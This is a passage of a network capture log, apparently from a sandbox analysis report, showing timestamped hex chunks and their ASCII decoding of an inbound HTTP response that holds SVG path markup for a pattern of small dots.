                                                                                                                                                                              2023-09-15 05:28:20 UTC7315INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                              Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                              2023-09-15 05:28:20 UTC7331INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                              Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7347INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                              Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7363INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                              Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                              2023-09-15 05:28:20 UTC7379INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                              Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7395INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                              Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                              2023-09-15 05:28:20 UTC7411INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                              Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                              2023-09-15 05:28:20 UTC7427INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                              Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7443INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                              Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                              2023-09-15 05:28:20 UTC7459INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                              2023-09-15 05:28:20 UTC7475INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                              Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                              2023-09-15 05:28:20 UTC7491INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC7507INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                              Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                              2023-09-15 05:28:20 UTC7523INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                              Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7539INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                              Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                              2023-09-15 05:28:20 UTC7555INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                              Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC7571INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                              Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
